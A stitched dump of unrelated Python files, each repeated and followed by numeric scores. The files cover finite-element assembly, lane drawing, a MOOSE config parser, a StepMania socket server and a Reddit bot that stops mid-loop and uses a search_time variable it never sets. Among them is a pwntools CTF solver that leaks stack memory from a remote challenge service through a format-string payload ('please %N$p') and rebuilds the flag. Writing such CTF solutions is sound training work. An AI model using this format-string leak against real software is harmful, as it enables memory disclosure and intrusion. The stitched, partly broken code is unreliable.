def systemMatrix(self, deriv):
return super(SymmetricSystem, self).processSystem(*it.tee(self.basis.getElementValues(self.refquadpoints,deriv), 2))
class AsymmetricSystem(System):
""" An Asymmetric system"""
def __init__(self, leftelements, rightelements, quadrule, meshevents, leftboundarytags, rightboundarytags):
leftbasis = Basis(leftelements)
rightbasis = Basis(rightelements)
meshevents(leftbasis)
meshevents(rightbasis)
super(AsymmetricSystem, self).__init__(quadrule, meshevents, leftbasis, rightbasis, processIndices(leftbasis, leftboundarytags), processIndices(rightbasis, rightboundarytags))
def systemMatrix(self, leftderiv, rightderiv):
leftvals = self.leftbasis.getElementValues(self.refquadpoints, leftderiv)
rightvals = self.rightbasis.getElementValues(self.refquadpoints, rightderiv)
return super(AsymmetricSystem, self).processSystem(leftvals, rightvals)
def transpose(self):
import copy
return copy.copy(self)._transposeinplace() | src/pypyr/assembly.py | import numpy
from pypyr.mesh import Basis, ElementFinder, ElementQuadrature, BoundaryQuadrature
import itertools as it
from pypyr.timing import *
def processIndices(basis, boundarytags):
""" Given a basis (a collection of elements) and a set of boundaries, extract the internal and external degrees of freedom
returns:
I: a sparse matrix that maps each the local degrees of freedom for each element to their global indices
boundaries: a map of tag->DegreeSet, which can be used to evaluate all the degrees on each boundary
internalidx: ids of the internal degrees of freedom
"""
import scipy.sparse as ss
indices = basis.getIndices()
n = basis.elementfactory.index # = max(indices)+1
I = ss.csr_matrix((numpy.ones_like(indices), indices, range(0,len(indices)+1)))
idxflag = numpy.ones(n, dtype=bool)
boundaries = {}
for tag in boundarytags:
bdy = basis.getBoundary(tag)
boundaries[tag] = bdy
if bdy: idxflag[bdy.indices] = False
internalidx = numpy.nonzero(idxflag)[0]
return I, boundaries, internalidx
def blockInnerProducts(quadweights, leftvalsiter, rightvalsiter, leftI, rightI):
""" Evaluate the inner product matrix
returns a sparse matrix equal to leftI.transpose * L.transpose * quadweights * R * rightI
where L and R are block diagonal matrices whose blocks are given by the iterables, leftvalsiter and rightvalsiter
If the left or right vals have more than 2 dimensions, the extra dimensions are multiplied and summed (tensor-contracted),
with broadcasting as necessary, i,e, this is an inner-product - it can't be used for a more general multiplication'
"""
import scipy.sparse as ss
data = []
idx = []
ip = [0]
for e, (leftvals, rightvals, weights) in enumerate(it.izip(leftvalsiter, rightvalsiter, quadweights)):
if len(weights):
lvs = len(leftvals.shape)
rvs = len(rightvals.shape)
vs = max(lvs,rvs)
leftvals = leftvals.reshape(leftvals.shape + (1,)*(vs - lvs))
rightvals = rightvals.reshape(rightvals.shape + (1,)*(vs - rvs))
lvw = leftvals * weights.reshape((-1,) + (1,)*(vs-1))
# print lvw.shape, rightvals.shape
data.append(numpy.tensordot(lvw, rightvals, ([0]+range(2,vs), [0]+range(2,vs))))
idx.append(e)
ip.append(len(idx))
# print e, idx, ip
V = ss.bsr_matrix((data, idx, ip),dtype=float, shape=(leftI.shape[0],rightI.shape[0]))
return leftI.transpose() * V * rightI
class System(object):
""" A System contains everything that's need to construct stiffness matrices and load vectors.
This is an abstract-ish class see SymmetricSystem and AsymmetricSystem for concrete implementations.
Parameters:
quadrule: a tuple of quadrature points and weights on the reference pyramid
meshevents: A function that produces mesh events
leftbasis, rightbasis: see pypyr.mesh.Basis
leftindexinfo, rightindexinfo: see processIndices
"""
def __init__(self, quadrule, meshevents, leftbasis, rightbasis, leftindexinfo, rightindexinfo):
self.elementfinder = meshevents(ElementFinder())
self.elementinfo = meshevents(ElementQuadrature())
self.boundaryquad = meshevents(BoundaryQuadrature())
self.refquadpoints, refweights = quadrule
self.quadweights = list(self.elementinfo.getWeights(self.refquadpoints, refweights))
self.leftbasis = leftbasis
self.rightbasis = rightbasis
self.leftI, self.leftbdys, self.leftintidx = leftindexinfo
self.rightI, self.rightbdys, self.rightintidx = rightindexinfo
def _transposeinplace(self):
""" Transpose this object """
self.leftbasis, self.rightbasis = self.rightbasis, self.leftbasis
self.leftI, self.rightI = self.rightI, self.leftI
self.leftbdys, self.rightbdys = self.rightbdys, self.leftbdys
self.leftintidx, self.rightintidx = self.rightintidx, self.leftintidx
return self
def processSystem(self, leftvalsiter, rightvalsiter):
""" Construct the (non-boundary aware) stiffness matrix """
return blockInnerProducts(self.quadweights, leftvalsiter, rightvalsiter, self.leftI, self.rightI)
def processBoundary(self, sysmat, tagtog):
""" Split the stiffness matrix into the internal and external parts. Evaluate boundary data
sysmat: system matrix (which will come from processSystem()).
tagtog: dictionary of functions to evaluate on the boundar(y|ies)
returns:
internalSystem: S[I,I] where I is the internal degrees
tagtoBoundarySystem: tag->S[I,E[tag]] where E[tag] gives the indices of the external degrees
tagtogvals: g[tag] evaluated at the degrees of freedom associated with boundary "tag".
Somewhat inefficient if there's a significant proportion of dofs on the boundary """
SI = sysmat[self.leftintidx, :]
internalSystem = SI[:,self.rightintidx]
tagtogvals = {}
tagtoBoundarySystem = {}
for tag, bdy in self.rightbdys.iteritems():
tagtogvals[tag] = bdy.evaluatedofs(tagtog[tag])
tagtoBoundarySystem[tag] = SI[:,bdy.indices]
return internalSystem, tagtoBoundarySystem, tagtogvals
def loadVector(self, f, deriv=False):
""" Calculate the load vector for the internal shape functions """
testvalsiter = self.leftbasis.getElementValues(self.refquadpoints, deriv)
fvalsiter = it.imap(f, self.elementinfo.getQuadPoints(self.refquadpoints))
return blockInnerProducts(self.quadweights, testvalsiter, fvalsiter, self.leftI, numpy.ones((self.elementinfo.numElements(), 1)))[self.leftintidx,:]
def boundaryLoad(self, tagtog, squarequad, trianglequad, deriv=False):
""" Calculate the load vector based on a boundary integral, e.g. for Dirichlet data in the dual formulation of the mixed laplacian"""
tagtogsys = {}
for tag, g in tagtog.iteritems():
x,w,n = zip(*self.boundaryquad.getQuadratures(tag, squarequad, trianglequad))
# print map(g,x,n)
# print map(lambda e,p: 0 if len(p) is 0 else e.values(p), self.leftbasis.elements, x)
fvalsiter = it.imap(g, x, n)
testvalsiter = it.imap(lambda e,p: 0 if len(p) is 0 else e.values(p), self.leftbasis.elements, x)
tagtogsys[tag] = blockInnerProducts(w, testvalsiter, fvalsiter, self.leftI, numpy.ones((self.elementinfo.numElements(), 1)))[self.leftintidx,:]
return tagtogsys
def evaluate(self, points, U, tagtoG = {}, deriv=False):
""" Evaluate a solution given by the coefficients of the internal degrees, U, at specified points.
tagtoG should be the coefficients for the external degrees"""
UG = numpy.zeros(self.rightbasis.elementfactory.index)
UG[self.rightintidx] = U
for tag, G in tagtoG.iteritems():
UG[self.rightbdys[tag].indices] = G
etop = self.elementfinder.elementPointMap(points)
UGvals = numpy.zeros((len(points), self.rightbasis.elements[0].ncpts))
for e, pids in zip(self.rightbasis.elements, etop):
if len(pids):
evals = e.derivs(points[pids]) if deriv else e.values(points[pids])
UGvals[pids] += numpy.tensordot(evals, UG[e.indices], ([1],[0]))
return UGvals
class SymmetricSystem(System):
""" A symmetric system"""
def __init__(self, elements, quadrule, meshevents, boundarytags):
self.basis = Basis(elements)
meshevents(self.basis)
indexinfo = processIndices(self.basis, boundarytags)
System.__init__(self, quadrule, meshevents, self.basis, self.basis, indexinfo, indexinfo)
self.elements = elements
def systemMatrix(self, deriv):
return super(SymmetricSystem, self).processSystem(*it.tee(self.basis.getElementValues(self.refquadpoints,deriv), 2))
class AsymmetricSystem(System):
""" An Asymmetric system"""
def __init__(self, leftelements, rightelements, quadrule, meshevents, leftboundarytags, rightboundarytags):
leftbasis = Basis(leftelements)
rightbasis = Basis(rightelements)
meshevents(leftbasis)
meshevents(rightbasis)
super(AsymmetricSystem, self).__init__(quadrule, meshevents, leftbasis, rightbasis, processIndices(leftbasis, leftboundarytags), processIndices(rightbasis, rightboundarytags))
def systemMatrix(self, leftderiv, rightderiv):
leftvals = self.leftbasis.getElementValues(self.refquadpoints, leftderiv)
rightvals = self.rightbasis.getElementValues(self.refquadpoints, rightderiv)
return super(AsymmetricSystem, self).processSystem(leftvals, rightvals)
def transpose(self):
import copy
return copy.copy(self)._transposeinplace() | 0.720958 | 0.70076 |
import numpy as np
import cv2
import lines
def draw_lane(img, warped_img, left_points, right_points, Minv):
# Create an image to draw the lines on
warp_zero = np.zeros_like(warped_img).astype(np.uint8)
color_warp = np.dstack((warp_zero, warp_zero, warp_zero))
# Recast the x and y points into usable format for cv2.fillPoly()
left_fitx = left_points[0]
right_fitx = right_points[0]
ploty = left_points[1]
pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])
pts_right = np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])
pts = np.hstack((pts_left, pts_right))
# Draw the lane onto the warped blank image
cv2.fillPoly(color_warp, np.int_([pts]), (0,255, 0))
# Warp the blank back to original image space using inverse perspective matrix (Minv)
newwarp = cv2.warpPerspective(color_warp, Minv, (img.shape[1], img.shape[0]))
# Combine the result with the original image
return cv2.addWeighted(img, 1, newwarp, 0.3, 0)
def add_metrics(img, leftx, rightx, xm_per_pix=3.7/800, ym_per_pix = 25/720):
# Calculate radius of curvature
curvature_rads = lines.curvature_radius(leftx=leftx, rightx=rightx, img_shape=img.shape,
xm_per_pix=xm_per_pix, ym_per_pix=ym_per_pix)
# Calculate car offset
offsetx = lines.car_offset(leftx=leftx, rightx=rightx, img_shape=img.shape)
# Display lane curvature
out_img = img.copy()
cv2.putText(out_img, 'Left lane line curvature: {:.2f} m'.format(curvature_rads[0]),
(60, 60), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (255,255,255), 5)
cv2.putText(out_img, 'Right lane line curvature: {:.2f} m'.format(curvature_rads[1]),
(60, 110), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (255,255,255), 5)
# Display car offset
cv2.putText(out_img, 'Horizontal car offset: {:.2f} m'.format(offsetx),
(60, 160), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (255,255,255), 5)
return out_img | draw.py | import numpy as np
import cv2
import lines
def draw_lane(img, warped_img, left_points, right_points, Minv):
# Create an image to draw the lines on
warp_zero = np.zeros_like(warped_img).astype(np.uint8)
color_warp = np.dstack((warp_zero, warp_zero, warp_zero))
# Recast the x and y points into usable format for cv2.fillPoly()
left_fitx = left_points[0]
right_fitx = right_points[0]
ploty = left_points[1]
pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])
pts_right = np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])
pts = np.hstack((pts_left, pts_right))
# Draw the lane onto the warped blank image
cv2.fillPoly(color_warp, np.int_([pts]), (0,255, 0))
# Warp the blank back to original image space using inverse perspective matrix (Minv)
newwarp = cv2.warpPerspective(color_warp, Minv, (img.shape[1], img.shape[0]))
# Combine the result with the original image
return cv2.addWeighted(img, 1, newwarp, 0.3, 0)
def add_metrics(img, leftx, rightx, xm_per_pix=3.7/800, ym_per_pix = 25/720):
# Calculate radius of curvature
curvature_rads = lines.curvature_radius(leftx=leftx, rightx=rightx, img_shape=img.shape,
xm_per_pix=xm_per_pix, ym_per_pix=ym_per_pix)
# Calculate car offset
offsetx = lines.car_offset(leftx=leftx, rightx=rightx, img_shape=img.shape)
# Display lane curvature
out_img = img.copy()
cv2.putText(out_img, 'Left lane line curvature: {:.2f} m'.format(curvature_rads[0]),
(60, 60), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (255,255,255), 5)
cv2.putText(out_img, 'Right lane line curvature: {:.2f} m'.format(curvature_rads[1]),
(60, 110), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (255,255,255), 5)
# Display car offset
cv2.putText(out_img, 'Horizontal car offset: {:.2f} m'.format(offsetx),
(60, 160), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (255,255,255), 5)
return out_img | 0.81335 | 0.650883 |
import os
import logging
import argparse
import configparser
import pyhit
import moosetree
import utils
def getParserArguments():
"""
Gets the arguments provided by the user via the command-line
Return
args: the arguments provided by the user and parsed by the Argument Parser
"""
# Create command-line interface
parser = argparse.ArgumentParser(prefix_chars='-',
description='Provide a MOOSE input file (.i) to generate a configuration file',
add_help=False)
options = parser.add_argument_group(title='Options')
options.add_argument('-i', metavar='<input_file>', dest='inputFile', help='Specify a MOOSE input file', nargs=1)
options.add_argument('-h', '--help', action='help', help='Displays CLI usage statement')
args, unknown = parser.parse_known_args()
# Validate the input file has ".i" extension
if args.inputFile:
utils.validateExtension(".i", args.inputFile[0])
return args
def getInputFilePath(args):
"""
Gets the path to the input file
Return
inputFile (string): the file path to the input file
isEnvVariable (bool): whether using the .env file or not (command-line)
"""
isEnvVariable = False
# Determine the input file depending on the use of the command-line interface
if args.inputFile is not None:
inputFile = args.inputFile[0]
else:
import settings
inputFile = os.getenv("CONFIG_INPUT_FILE_NAME")
isEnvVariable = True
return inputFile, isEnvVariable
def getConfigFileName(inputFile: str = None):
"""
Returns the name of the config file
Args
inputFile (string): the path to use for the config filename (command-line only)
Return
configFile (string): the file path to the config file
"""
if inputFile:
base, extension = os.path.splitext(inputFile)
configFile = '.'.join([base, 'cfg'])
else:
configFile = os.getenv("CONFIG_FILE_NAME")
return configFile
def getParamsOfNode(node: moosetree.Node, root: moosetree.Node):
"""
Determine the parameters that can be modified which have a comment with '{{config}})'
Args
node (Node): a moosetree node
root (Node): the root moosetree node
Return
section (string): the full path of the node
paramDict (dictionary): dictionary of key, value pairs of the parameter name and the datatype
"""
# Get the key, value for the parameters of this node
nodeParameters = dict(node.params())
if root:
rootParameters = dict(root.params())
paramsDict = dict()
# Determine parameters with the comment {{config}} to add to the config file
for nodeKey, nodeValue in nodeParameters.items():
comment = node.comment(param=nodeKey)
if comment is not None:
if '{{config}}' in comment:
if isinstance(nodeValue, str):
# If value is a global variable at top of input file, use the datatype of the parameter from configDict
# Purpose: type('${xmax}') = str but should be int
if '${' in nodeValue:
modifiedValue = nodeValue.replace('${', '')
modifiedValue = modifiedValue.replace('}', '')
for rootKey, rootValue in rootParameters.items():
if rootKey == modifiedValue:
paramsDict[nodeKey] = type(rootValue).__name__
else:
paramsDict[nodeKey] = type(nodeValue).__name__
else:
paramsDict[nodeKey] = type(nodeValue).__name__
# Return sections and a dictionary of parameters
if len(paramsDict) != 0:
if node.fullpath:
section = node.fullpath
else:
section = 'root'
return section, paramsDict
def getConfigParameters(inputFile: str):
"""
Determine the section and parameters for the configuration file
Args
inputFile (string): the input file for pyhit to read
Return
configParams (dictionary): a dictionary of configuration parameters {section: dict(parameter name: datatype of value)}
"""
configParams = dict()
# Read the file
root = pyhit.load(inputFile)
# Get nodes
nodes = list(moosetree.iterate(root, method=moosetree.IterMethod.PRE_ORDER))
# For root node: Determine global variables with the comment {{config}} to add to the config file
section, paramsDict = getParamsOfNode(root, None) or (None, None)
if section and paramsDict:
configParams[section] = paramsDict
# For subsection nodes: Determine parameters with the comment {{config}} to add to the config file
for node in nodes:
section, paramsDict = getParamsOfNode(node, root) or (None, None)
if section and paramsDict:
configParams[section] = paramsDict
return configParams
def writeConfigFile(configParams: dict, configFile: str):
"""
Write the config parameters to a configuration file
Args
configParams (dictionary): a dictionary of configuration parameters {section: dict(parameter name: datatype of value)}
configFile (string): name of the configuration file to write
Return
True: if config file path exists
False: if config file path does not exist
"""
config = configparser.ConfigParser()
for key, value in configParams.items():
config[key] = value
# Write config to file
with open(configFile, 'w') as configfile:
config.write(configfile)
if os.path.exists(configFile):
return True
return False
def main():
""" Main entry point for script
Return
True: if successfully generated a configuration file
False: if invalid input file
"""
args = getParserArguments()
inputFile, isEnvVariable = getInputFilePath(args)
utils.validatePathsExist(inputFile)
if isEnvVariable:
logging.info('Template Parser started. Using input file %s', os.getenv('CONFIG_INPUT_FILE_NAME'))
configFile = getConfigFileName()
else:
configFile = getConfigFileName(inputFile)
configParams = getConfigParameters(inputFile)
isConfigFileCreated = writeConfigFile(configParams, configFile)
if isConfigFileCreated:
if isEnvVariable:
logging.info(
'Success: The Template Parser used the MOOSE input file %s to generate a configuration file %s',
os.getenv('CONFIG_INPUT_FILE_NAME'), os.getenv('CONFIG_FILE_NAME'))
else:
print('Success: The provided MOOSE input file %s generated a configuration file %s' %
(inputFile, configFile))
return True
else:
if isEnvVariable:
logging.error('Fail: Provide a valid path to a MOOSE input file (.i) to generate a configuration file')
else:
print('Fail: Provide a valid path to a MOOSE input file (.i) to generate a configuration file')
return False
if __name__ == '__main__':
main() | adapter/template_parser.py |
import os
import logging
import argparse
import configparser
import pyhit
import moosetree
import utils
def getParserArguments():
"""
Gets the arguments provided by the user via the command-line
Return
args: the arguments provided by the user and parsed by the Argument Parser
"""
# Create command-line interface
parser = argparse.ArgumentParser(prefix_chars='-',
description='Provide a MOOSE input file (.i) to generate a configuration file',
add_help=False)
options = parser.add_argument_group(title='Options')
options.add_argument('-i', metavar='<input_file>', dest='inputFile', help='Specify a MOOSE input file', nargs=1)
options.add_argument('-h', '--help', action='help', help='Displays CLI usage statement')
args, unknown = parser.parse_known_args()
# Validate the input file has ".i" extension
if args.inputFile:
utils.validateExtension(".i", args.inputFile[0])
return args
def getInputFilePath(args):
"""
Gets the path to the input file
Return
inputFile (string): the file path to the input file
isEnvVariable (bool): whether using the .env file or not (command-line)
"""
isEnvVariable = False
# Determine the input file depending on the use of the command-line interface
if args.inputFile is not None:
inputFile = args.inputFile[0]
else:
import settings
inputFile = os.getenv("CONFIG_INPUT_FILE_NAME")
isEnvVariable = True
return inputFile, isEnvVariable
def getConfigFileName(inputFile: str = None):
"""
Returns the name of the config file
Args
inputFile (string): the path to use for the config filename (command-line only)
Return
configFile (string): the file path to the config file
"""
if inputFile:
base, extension = os.path.splitext(inputFile)
configFile = '.'.join([base, 'cfg'])
else:
configFile = os.getenv("CONFIG_FILE_NAME")
return configFile
def getParamsOfNode(node: moosetree.Node, root: moosetree.Node):
"""
Determine the parameters that can be modified which have a comment with '{{config}})'
Args
node (Node): a moosetree node
root (Node): the root moosetree node
Return
section (string): the full path of the node
paramDict (dictionary): dictionary of key, value pairs of the parameter name and the datatype
"""
# Get the key, value for the parameters of this node
nodeParameters = dict(node.params())
if root:
rootParameters = dict(root.params())
paramsDict = dict()
# Determine parameters with the comment {{config}} to add to the config file
for nodeKey, nodeValue in nodeParameters.items():
comment = node.comment(param=nodeKey)
if comment is not None:
if '{{config}}' in comment:
if isinstance(nodeValue, str):
# If value is a global variable at top of input file, use the datatype of the parameter from configDict
# Purpose: type('${xmax}') = str but should be int
if '${' in nodeValue:
modifiedValue = nodeValue.replace('${', '')
modifiedValue = modifiedValue.replace('}', '')
for rootKey, rootValue in rootParameters.items():
if rootKey == modifiedValue:
paramsDict[nodeKey] = type(rootValue).__name__
else:
paramsDict[nodeKey] = type(nodeValue).__name__
else:
paramsDict[nodeKey] = type(nodeValue).__name__
# Return sections and a dictionary of parameters
if len(paramsDict) != 0:
if node.fullpath:
section = node.fullpath
else:
section = 'root'
return section, paramsDict
def getConfigParameters(inputFile: str):
"""
Determine the section and parameters for the configuration file
Args
inputFile (string): the input file for pyhit to read
Return
configParams (dictionary): a dictionary of configuration parameters {section: dict(parameter name: datatype of value)}
"""
configParams = dict()
# Read the file
root = pyhit.load(inputFile)
# Get nodes
nodes = list(moosetree.iterate(root, method=moosetree.IterMethod.PRE_ORDER))
# For root node: Determine global variables with the comment {{config}} to add to the config file
section, paramsDict = getParamsOfNode(root, None) or (None, None)
if section and paramsDict:
configParams[section] = paramsDict
# For subsection nodes: Determine parameters with the comment {{config}} to add to the config file
for node in nodes:
section, paramsDict = getParamsOfNode(node, root) or (None, None)
if section and paramsDict:
configParams[section] = paramsDict
return configParams
def writeConfigFile(configParams: dict, configFile: str):
"""
Write the config parameters to a configuration file
Args
configParams (dictionary): a dictionary of configuration parameters {section: dict(parameter name: datatype of value)}
configFile (string): name of the configuration file to write
Return
True: if config file path exists
False: if config file path does not exist
"""
config = configparser.ConfigParser()
for key, value in configParams.items():
config[key] = value
# Write config to file
with open(configFile, 'w') as configfile:
config.write(configfile)
if os.path.exists(configFile):
return True
return False
def main():
""" Main entry point for script
Return
True: if successfully generated a configuration file
False: if invalid input file
"""
args = getParserArguments()
inputFile, isEnvVariable = getInputFilePath(args)
utils.validatePathsExist(inputFile)
if isEnvVariable:
logging.info('Template Parser started. Using input file %s', os.getenv('CONFIG_INPUT_FILE_NAME'))
configFile = getConfigFileName()
else:
configFile = getConfigFileName(inputFile)
configParams = getConfigParameters(inputFile)
isConfigFileCreated = writeConfigFile(configParams, configFile)
if isConfigFileCreated:
if isEnvVariable:
logging.info(
'Success: The Template Parser used the MOOSE input file %s to generate a configuration file %s',
os.getenv('CONFIG_INPUT_FILE_NAME'), os.getenv('CONFIG_FILE_NAME'))
else:
print('Success: The provided MOOSE input file %s generated a configuration file %s' %
(inputFile, configFile))
return True
else:
if isEnvVariable:
logging.error('Fail: Provide a valid path to a MOOSE input file (.i) to generate a configuration file')
else:
print('Fail: Provide a valid path to a MOOSE input file (.i) to generate a configuration file')
return False
if __name__ == '__main__':
main() | 0.562898 | 0.149531 |
from pwn import * #Pwn Tools
import time # Sometimes the connection would time out a lot, using time.sleep reduced the timeouts.
context.log_level = 'critical' # Pwn tools config to tell us everything
lines = [] # Empty array which will contain all raw outputs
flag_chars = "" # Empty string where the entire output will be stitched into
flag_bytes = [] # Empty array where we will take 2 bits of string from flag_chars to create a byte and store them
flag_words = [] # Empty array where we will store 8 bytes at a time from flag_bytes
flag = [] # Empty array where the final flag will go
for i in range(70, 75): # A loop iterating where i is between 70 and 74
s = remote('mc.ax', 31569) # Connect to remote host
#s = process('./please') # Use this to locally test
s.recvline() # Recieve the first line the program tells us
s.sendline('please %' + str(i) + '$p') # Send in our payload, the please string, and ith %p
output = str(s.recv())[9:-15][2:] # We get the raw output and strip it saw that only the hex value remains
print(output) # Print the stripped output, just in case
lines.append(output) # Append the output in lines
s.close() # Close the connection
time.sleep(5) # Wait 5 seconds and loop or continue
lines[-1] = '000' + lines[-1] # We add 000 before the last element of outputs.
for byte in lines:
flag_chars += byte # Stitch all outputs into one big string
for x, y in zip(*[iter(flag_chars)]*2): # We iterate 2 characters at a time, x is first character and y is second, character represents bits of a byte that is
byte = str(x) + str(y) # Our byte is then x + y. So "44434241" will become "['44'], ['43'], ['42']..."
flag_bytes.append(byte) # We append the bytes to our array
if(len(flag_bytes) % 8 == 0): # After 8 bytes have been written on the flag_bytes array,
flag_words.append(flag_bytes) # We append these 8 bytes as one word in flag_words
flag_bytes = [] # And reset flag_bytes
for word in flag_words: # We take each word (8 bytes)
for byte in word[::-1]: # We reverse them
try:
flag.append(bytes.fromhex(byte).decode('ASCII')) # Convert them from hex to binary and decode in ascii and store each ASCII character in flag
except:
pass # Not all bytes are printable (such as the last ones where we added 0s, so we catch the erros and ignore them)
print("".join(flag)) # We join the characters into a flag and print it | pwn/SOLVED_printf-please/ape.py | from pwn import * #Pwn Tools
import time # Sometimes the connection would time out a lot, using time.sleep reduced the timeouts.
context.log_level = 'critical' # Pwn tools config to tell us everything
lines = [] # Empty array which will contain all raw outputs
flag_chars = "" # Empty string where the entire output will be stitched into
flag_bytes = [] # Empty array where we will take 2 bits of string from flag_chars to create a byte and store them
flag_words = [] # Empty array where we will store 8 bytes at a time from flag_bytes
flag = [] # Empty array where the final flag will go
for i in range(70, 75): # A loop iterating where i is between 70 and 74
s = remote('mc.ax', 31569) # Connect to remote host
#s = process('./please') # Use this to locally test
s.recvline() # Recieve the first line the program tells us
s.sendline('please %' + str(i) + '$p') # Send in our payload, the please string, and ith %p
output = str(s.recv())[9:-15][2:] # We get the raw output and strip it saw that only the hex value remains
print(output) # Print the stripped output, just in case
lines.append(output) # Append the output in lines
s.close() # Close the connection
time.sleep(5) # Wait 5 seconds and loop or continue
lines[-1] = '000' + lines[-1] # We add 000 before the last element of outputs.
for byte in lines:
flag_chars += byte # Stitch all outputs into one big string
for x, y in zip(*[iter(flag_chars)]*2): # We iterate 2 characters at a time, x is first character and y is second, character represents bits of a byte that is
byte = str(x) + str(y) # Our byte is then x + y. So "44434241" will become "['44'], ['43'], ['42']..."
flag_bytes.append(byte) # We append the bytes to our array
if(len(flag_bytes) % 8 == 0): # After 8 bytes have been written on the flag_bytes array,
flag_words.append(flag_bytes) # We append these 8 bytes as one word in flag_words
flag_bytes = [] # And reset flag_bytes
for word in flag_words: # We take each word (8 bytes)
for byte in word[::-1]: # We reverse them
try:
flag.append(bytes.fromhex(byte).decode('ASCII')) # Convert them from hex to binary and decode in ascii and store each ASCII character in flag
except:
pass # Not all bytes are printable (such as the last ones where we added 0s, so we catch the erros and ignore them)
print("".join(flag)) # We join the characters into a flag and print it | 0.167729 | 0.521167 |
import socket
from threading import Thread
from smserver.smutils import smconn
class SocketConn(smconn.StepmaniaConn, Thread):
ENCODING = "binary"
def __init__(self, serv, ip, port, conn):
Thread.__init__(self)
smconn.StepmaniaConn.__init__(self, serv, ip, port)
self._conn = conn
def received_data(self):
full_data = b""
size = None
data_left = b""
while True:
if len(data_left) > 0:
data = data_left
data_left = b""
else:
try:
data = self._conn.recv(8192)
except socket.error:
yield None
continue
if data == b'':
yield None
continue
if not size:
if len(data) < 5:
self.log.info("packet %s drop: to short", data)
continue
full_data = data[:4]
data = data[4:]
size = int.from_bytes(full_data[:4], byteorder='big')
if len(data) < size - len(full_data):
full_data += data
continue
payload_size = len(full_data) - 4 + size
full_data += data[:payload_size]
yield full_data
data_left = data[payload_size:]
full_data = b""
size = None
def send_data(self, data):
with self.mutex:
try:
self._conn.sendall(data)
except OSError:
self.close()
def close(self):
self._conn.close()
smconn.StepmaniaConn.close(self)
class SocketServer(smconn.SMThread):
def __init__(self, server, ip, port):
smconn.SMThread.__init__(self, server, ip, port)
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._socket.bind((self.ip, self.port))
self._socket.listen(5)
self._continue = True
self._connections = []
def run(self):
while self._continue:
try:
conn, addr = self._socket.accept()
except socket.error:
self._socket.close()
break
ip, port = addr
thread = SocketConn(self.server, ip, port, conn)
self.server.add_connection(thread)
thread.start()
smconn.SMThread.run(self)
def stop(self):
smconn.SMThread.stop(self)
self._continue = False
self._socket.shutdown(socket.SHUT_RDWR) | smserver/smutils/smconnections/smtcpsocket.py |
import socket
from threading import Thread
from smserver.smutils import smconn
class SocketConn(smconn.StepmaniaConn, Thread):
ENCODING = "binary"
def __init__(self, serv, ip, port, conn):
Thread.__init__(self)
smconn.StepmaniaConn.__init__(self, serv, ip, port)
self._conn = conn
def received_data(self):
full_data = b""
size = None
data_left = b""
while True:
if len(data_left) > 0:
data = data_left
data_left = b""
else:
try:
data = self._conn.recv(8192)
except socket.error:
yield None
continue
if data == b'':
yield None
continue
if not size:
if len(data) < 5:
self.log.info("packet %s drop: to short", data)
continue
full_data = data[:4]
data = data[4:]
size = int.from_bytes(full_data[:4], byteorder='big')
if len(data) < size - len(full_data):
full_data += data
continue
payload_size = len(full_data) - 4 + size
full_data += data[:payload_size]
yield full_data
data_left = data[payload_size:]
full_data = b""
size = None
def send_data(self, data):
with self.mutex:
try:
self._conn.sendall(data)
except OSError:
self.close()
def close(self):
self._conn.close()
smconn.StepmaniaConn.close(self)
class SocketServer(smconn.SMThread):
def __init__(self, server, ip, port):
smconn.SMThread.__init__(self, server, ip, port)
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._socket.bind((self.ip, self.port))
self._socket.listen(5)
self._continue = True
self._connections = []
def run(self):
while self._continue:
try:
conn, addr = self._socket.accept()
except socket.error:
self._socket.close()
break
ip, port = addr
thread = SocketConn(self.server, ip, port, conn)
self.server.add_connection(thread)
thread.start()
smconn.SMThread.run(self)
def stop(self):
smconn.SMThread.stop(self)
self._continue = False
self._socket.shutdown(socket.SHUT_RDWR) | 0.322419 | 0.168515 |
import sys
import time
import logging
import praw
import prawcore
from pprint import pprint
submission_pool = []
# Set to True to test, posts won't be removed
POST_TEST_MODE = False
# Set to a discord webhook for announcements
DISCORD_WEBHOOK_URL = None
def main():
# SET THESE - reddit application configuration
user_agent = ''
client_id = ''
client_secret = ''
username = ''
password = ''
# SET THESE - Customize these for your subreddit.
subreddit_name = ''
post_limit_count = 4
post_limit_hours = 24
logging.basicConfig(
format='%(asctime)s %(levelname)s %(message)s',
level=logging.INFO
)
reddit = praw.Reddit(user_agent=user_agent,
client_id=client_id,
client_secret=client_secret,
username=username,
password=password)
logging.info('Watching subreddit: %s', subreddit_name)
logging.info('Current limit set to %d posts in %d hours',
post_limit_count, post_limit_hours)
subreddit = reddit.subreddit(subreddit_name)
check_subreddit(subreddit, post_limit_count, post_limit_hours)
def filter_submissions(submissions, start_time, end_time = None, username = None):
"""Return all submissions created after the start_time.
Optional: Also before end_time if given.
Optional: Also by username if given."""
filtered = []
for s in submissions:
if end_time and s.created_utc >= end_time:
continue
elif username and username != s.author.name:
continue
elif s.created_utc > start_time:
filtered.append(s)
return filtered
def check_subreddit(subreddit, post_limit_count, post_limit_hours):
global submission_pool
max_new_submissions = 100
loop_delay = 119 # seconds
# Initial search range will start 10m ago.
#search_time = time.time() - (60*60*6)
# The loop
running = True
dotter = Dotter(120)
while running:
while True:
submission_pool = []
try:
submissions = subreddit.new(limit=max_new_submissions)
except praw.exceptions.APIException as e:
logging.error('API Exception!')
pprint(vars(e))
logging.info('Retrying in 60 seconds.')
time.sleep(60)
except praw.exceptions.ClientException as e:
logging.error('Client Exception!')
pprint(vars(e))
logging.info('Retrying in 60 seconds.')
time.sleep(60)
except prawcore.exceptions.OAuthException as e:
logging.critical('Login failed.')
sys.exit(1)
except Exception as e:
pprint(vars(e))
time.sleep(120)
else:
for s in submissions:
submission_pool.append(s)
if search_time:
new_submissions = filter_submissions(submission_pool, search_time)
else:
new_submissions = [ submission_pool[0] ]
